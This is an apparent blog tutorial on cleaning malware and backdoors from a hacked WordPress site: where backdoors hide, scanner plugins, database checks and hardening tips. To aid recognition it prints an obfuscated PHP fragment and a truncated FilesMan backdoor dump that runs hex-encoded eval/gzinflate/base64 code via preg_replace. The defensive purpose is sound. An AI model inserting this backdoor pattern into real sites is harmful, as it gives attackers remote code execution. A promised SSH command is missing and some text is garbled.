How to Remove Malware & Fix a Hacked WordPress Site

Time and time again, we have helped users fix their hacked WordPress sites. Most of the time when they reach out to us, they have already cleaned up the site, and the hacker was able to get back in. This happens if you did not clean it up properly, or you did not know what you were looking for. In most cases that we found, there was a backdoor created by the hacker which allowed them to bypass normal authentication. In this article, we will show you how to Fix a Hacked WordPress.

What is WordPress Backdoor?

Backdoor is referred to as a method of bypassing normal authentication and gaining the ability to remotely access the server while remaining undetected. Most smart hackers always upload backdoor as the first thing. This allows them to regain access even after you find and remove the exploited plugin. Backdoors often survive the upgrades, so your site is vulnerable until you clean this mess up.

Some backdoors simply allow users to create hidden admin username. Whereas the more complex backdoors can allow the hacker to execute any PHP code sent from the browser. Others have a full-fledged UI that allows them to send emails as your server, execute SQL queries, and everything else they want to do.

Where is this Code Hidden?

Backdoors on a WordPress install are most commonly stored in the following locations:

  1. Themes – Most likely it is not in the current theme that you are using. Hackers want the code to survive core updates. So if you have the old Kubrick theme sitting in your themes directory, or another inactive theme, then the codes will probably be in there. This is why we recommend deleting all the inactive themes.
  2. Plugins – Plugins are a great place for the hacker to hide the code for three reasons. One because people don’t really look at them. Two because people don’t like to upgrade their plugins, so they survive the upgrades (folks keep them up to date). Three, there are some poorly coded plugins which probably have their own vulnerabilities to begin with.
  3. Uploads Directory – As a blogger, you never ever check your uploads directory. Why would you? You just upload the image and use it in your post. You probably have thousands of images in the uploads folder divided by year and month. It is very easy for the hacker to upload a backdoor in the uploads folder because it will hide among thousands of media files. Plus you don’t check it regularly. Most folks don’t have a monitoring plugin like Sucuri. Lastly, the uploads directory is writable, so it can work the way it is supposed to. This makes it a great target. A lot of backdoors we find are in there.
  4. wp-config.php – This is also one of the highly targeted files by hackers. It is also one of the first places most folks are told to look.
  5. Includes Folder – /wp-includes/ folder is another place that we find backdoors. Some hackers will always leave more than one backdoor file. Once they upload one, they will add another backup to ensure their access. Includes folder is another one where most people don’t bother looking.
Related  Best Tips to keep your WordPress website secure –The Ultimate WordPress Security Guide (2020)

In all the cases we found, the backdoor was disguised to look like a WordPress file.

It can also use names like wp-content.old.tmp, data.php, php5.php, or something of that sort. It doesn’t have to end with PHP just because it has PHP code in it. It can also be a .zip file. In most cases, these files are encoded with base64 code that usually perform all sort operations (i.e add spam links, add additional pages, redirect the main site to spammy pages, etc).

How to Find and Clean the Backdoor?

Now that you know what a backdoor is, and where it can be found. You need to start looking for it. Cleaning it up is as easy as deleting the file or code. However, the difficult part is finding it. You can start with one of the following malware scanner WordPress plugins.

You can also use the Exploit Scanner, but remember that base64 and eval codes are also used in plugins. So sometimes it will return a lot of false positives. If you are not the developer of the plugins, then it is really hard for you to know which code is out of its place in the thousands of lines of code. The best thing you can do is delete your plugins directory, and reinstall your plugins from scratch. Yup, this is the only way you can be sure unless you have a lot of time to spend.

Search the Uploads Directory

One of the scanner plugins will find a rogue file in the uploads folder. But if you are familiar with SSH, then you just need to write the following command:

Delete Inactive Themes

As we mentioned above, often the inactive themes are targeted. The best thing to do is delete them (yup this includes the default and classic theme). But wait, I didn’t check to see if the backdoor was in there. If it was, then it is gone now. You just saved your time from looking, and you eliminated an extra point of attack.

Locating WordPress backdoor in installation files

Modifying core files comes next after the plugin is infected. There may be rogue code in base files or new files may appear. At times the backdoor may look gibberish like this here:

$t43="l/T6\\:aAcNLn#?rP}1\rG_ 
-s`SZ\$58t\n7E{.*]ixy3h,COKR2dW[0!U\tuQIHf4bYm>wFz<[email protected]&(BjX'~|ge%p+oMJv^);\"k9";
$GLOBALS['ofmhl60'] = ${$t43[20].$t43

This code is obfuscated using known techniques. Thus making it harder for human users to read. So, look out for such fishy looking code and remove the files containing it. At times the backdoor may also present itself as a legitimate file like xml.phpmedia.phpplugin.php etc. So don’t skip any file even if looks legitimate. Moreover, there are other techniques to make code difficult to read.

Also, look out for the keyword FilesMan in your files. For instance, this is the dump of the infamous backdoor Filesman:02. This backdoor is hard to detect and not visible in logs. It is used to steal passwords and other details.

<?php
$auth_pass = "";
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","x65x76x61x6Cx28x67x7Ax69x6Ex66x6Cx61x74x65x28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/t..NRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='x29x29x29x3B",".");
?>

For instance, the code in the 6th line is in the hex form. When converted it would look something like: preg_replace("/.*/e","eval(gzinfla\. There are tools available online to decode hex characters. Use them! Also, the attacker can hide code using base64 encoding. So treat it similarly.  Here the keyword FilesMan is present in the 4th line. Such variants of this infection have this keyword. At times it is possible that the code may be tampering with sensitive files like .htaccess. So ensure to take a good look through these!

.htaccess File

Sometimes the redirect codes are being added there. Just delete the file, and it will recreate itself. If it doesn’t, go to your WordPress admin panel. Settings » Permalinks. Click the save button there. It will recreate the .htaccess file.

Change Permalinks

wp-config.php file

Compare this file with the default wp-config-sample.php file. If you see something that is out of place, then get rid of it.

Related  WordPress Plugin Tutorial: How to Create a WordPress Plugin

Database Scan for Exploits and SPAM

A smart hacker will never have just one safe spot. They create numerous ones. Targeting a database full of data is a very easy trick. They can store their bad PHP functions, new administrative accounts, SPAM links, etc in the database. Yup, sometimes you won’t see the admin user in your user’s page. You will see that there are 3 users, and you can only see 2. Chances are you are hacked.

If you don’t know what you are doing with SQL, then you probably want to let one of these scanners do the work for you. Exploit Scanner plugin or Sucuri (paid version) both take care of that.

How to Prevent Hacks in the Future?

Our #1 advice would be to keep strong backups and start using a monitoring service. Like we said earlier, you cannot possibly monitor everything that goes on your site when you are doing tons of other things.

Few other things you can do:

  1. Use Strong Passwords – Force strong passwords on your users. Start using a password managing utility like 1Password.
  2. 2-Step Authentication – If your password got compromised, the user would still need to have the verification code from your phone.
  3. Limit Login Attempts – This plugin allows you to lock the user out after X numbers of failed login attempts.
  4. Disable Theme and Plugin Editors – This prevents user escalation issues. Even if the user’s privileges were escalated, they couldn’t modify your theme or plugins using the WP-Admin.
  5. Password Protect WP-Admin – You can password protect the entire directory. You can also limit access by IP.
  6. Disable PHP Execution in Certain WordPress Directories – This disables PHP execution in the upload directories and other directories of your choice. Basically so even if someone was able to upload the file in your uploads folder, they wouldn’t be able to execute it.
  7. Stay UPDATED – Run the latest version of WordPress, and upgrade your plugins.

Lastly, don’t be cheap when it comes to security. We always say that the best security measure is great backups. Please please please keep good regular backups of your site. Most hosting companies DO NOT do this for you.

Conclusions

We hope that this article helped you. Feel free to leave a comment below if you have something to add  You may also want to bookmark our guide on  Complete WordPress tutorial

Boost your Carrier to Next Level: How to How to Become a WordPress Developer in 2020 – A Complete Guide